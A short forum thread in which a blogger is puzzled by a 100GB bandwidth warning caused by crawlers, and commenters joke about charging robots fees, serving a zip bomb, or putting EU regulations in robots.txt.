Got a warning for my blog going over 100GB in bandwidth this month… which sounded incredibly unusual. My blog is text and a couple images and I haven’t posted anything to it in ages… like how would that even be possible?
Turns out it’s possible when you have crawlers going apeshit on your server. Am I even reading this right? 12,181 with 181 zeros at the end for ‘Unknown robot’? This is actually bonkers.


ProfitSilenceCan you just turn the robots.txt into a click wrap agreement to charge robots high fees for access above a certain threshold?
why do a agreement when you can serve a zip bomb :D
Puts the full EU regulations in robot.txt